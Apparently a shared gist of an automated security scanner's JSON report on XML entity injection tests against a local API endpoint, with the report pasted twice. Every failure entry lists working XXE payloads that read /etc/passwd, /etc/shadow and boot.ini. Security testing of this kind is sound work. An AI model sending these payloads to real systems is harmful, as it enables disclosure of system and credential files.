MCDong/gist:1cc3775d2e43381bc55072df1a43b375 Secret

## gistfile1.txt
{
  "errors": [],
  "failures": {
    "localhost:8000/v3/domains": {
      "XML_ENTITY_HEADERS": {
        "POST - headers|Accept": {
          "500_errors": {
            "confidence": "High",
            "description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
            "payloads": [
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
            ],
            "severity": "Low"
          }
        },
        "POST - headers|Content-type": {
          "500_errors": {
            "confidence": "High",
            "description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
            "payloads": [
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
            ],
            "severity": "Low"
          }
        },
        "POST - headers|X-Auth-Token": {
          "500_errors": {
            "confidence": "High",
            "description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
            "payloads": [
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
            ],
            "severity": "Low"
          }
        }
      }
    }
  },
  "stats": {
    "errors": 0,
    "failures": 9,
    "successes": 0
  }
}
	{
	"errors": [],
	"failures": {
	"localhost:8000/v3/domains": {
	"XML_ENTITY_HEADERS": {
	"POST - headers\|Accept": {
	"500_errors": {
	"confidence": "High",
	"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
	"payloads": [
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
	],
	"severity": "Low"
	}
	},
	"POST - headers\|Content-type": {
	"500_errors": {
	"confidence": "High",
	"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
	"payloads": [
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
	],
	"severity": "Low"
	}
	},
	"POST - headers\|X-Auth-Token": {
	"500_errors": {
	"confidence": "High",
	"description": "This request returns an error with status code 501, which might indicate some server-side faultthat could lead to further vulnerabilities",
	"payloads": [
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>",
	"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>"
	],
	"severity": "Low"
	}
	}
	}
	}
	},
	"stats": {
	"errors": 0,
	"failures": 9,
	"successes": 0
	}
	}